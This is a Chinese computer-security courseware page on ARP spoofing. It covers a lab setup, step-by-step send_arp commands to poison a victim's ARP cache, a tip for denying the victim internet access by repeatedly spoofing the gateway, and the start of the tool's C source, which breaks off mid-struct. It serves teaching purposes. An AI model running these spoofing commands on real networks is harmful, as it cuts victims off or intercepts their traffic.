计算机安全技术TOOLS教程课件5.5.1 实例：arp欺骗.docVIP

5.5.1 实例：arp欺骗 1．实验环境 实验环境如图5-34所示。欺骗者（192.168.1.10），被欺骗者（192.168.1.20）。 2．arp欺骗过程 第1步：被欺骗者可以ping通欺骗者。被欺骗者（192.168.1.20）执行ping 192.168.1.10 -n 1命令，可以ping通。然后执行arp -a命令查看arp缓存，得知欺骗者（192.168.1.10）的MAC地址为00:30:18:91:20:54，如图5-35所示。 第2步：进行arp欺骗。如图5-36所示，欺骗者（192.168.1.10）先执行ping 192.168.1.20 -c 1命令，可以ping通。然后执行arp -a命令查看arp缓存，得知被欺骗者（192.168.1.20）的MAC地址为00:C0:9F:97:E3:F9。再执行ifconfig eth0命令，查看本网卡的MAC地址，然后执行./send_arp.o 192.168.1.10 00:0c:29:d5:91:11 192.168.1.20 00:C0:9F:97:E3:F9 1命令，对192.168.1.20进行arp欺骗。其中，send_arp.o语法为： send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number 提示： 被欺骗者（192.168.1.20）MAC地址的获得可以先执行ping 192.168.1.10命令，然后执行arp -a命令查看arp缓存。 图5-34 实验环境 图5-35 被欺骗者可以ping通欺骗者 图5-36 进行arp欺骗 图5-37 被欺骗者不可以ping通欺骗者 第3步：被欺骗者不可以ping通欺骗者。如图5-37所示，先执行ping 192.168.1.10 -n 1命令，不可以ping通，再执行arp -a命令查看arp缓存，可知192.168.1.10的MAC地址已变。 如果本网络的网关是192.168.1.1，那么想让192.168.1.20不能访问互联网，就可以执行命令./send_arp.o 192.168.1.1 xx:xx:xx:xx:xx:xx 192.168.1.20 00:C0:9F:97:E3:F9 1命令，对192.168.1.20进行arp欺骗。可以每分钟执行一次该命令，192.168.1.20得不到正确的到网关的arp映射表项，就访问不了互联网了。 3．源程序 头文件“send_arp.h”： 1 #include stdlib.h 2 #include netdb.h 3 #include sys/socket.h 4 #include sys/types.h 5 #include stdio.h 6 #include errno.h 7 #include sys/ioctl.h 8 #include net/if.h 9 #include signal.h 10 #include netinet/ip.h 11 #include netinet/in.h 12 #include string.h 13 #include arpa/inet.h 14 #include netinet/ip_icmp.h 15 #include linux/if_ether.h 16 17 #define ETH_HW_ADDR_LEN 6 18 #define IP_ADDR_LEN 4 19 #define ARP_FRAME_TYPE 0x0806 20 #define ETHER_HW_TYPE 1 21 #define IP_PROTO_TYPE 0x0800 22 #define OP_ARP_REQUEST 2 23 #define OP_ARP_QUEST 1 24 #define DEFAULT_DEVICE eth0 25 char usage[] = {send_arp: sends out custom ARP packet. \n 26 usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number}; 27 28 struct arp_packet 29 { 30 u_char targ_hw_addr[ETH_HW_ADDR_LEN]; 31 u_char src_hw_addr[ETH_HW_ADDR_LEN]; 32 u_short frame_type; 33 u_short hw_type;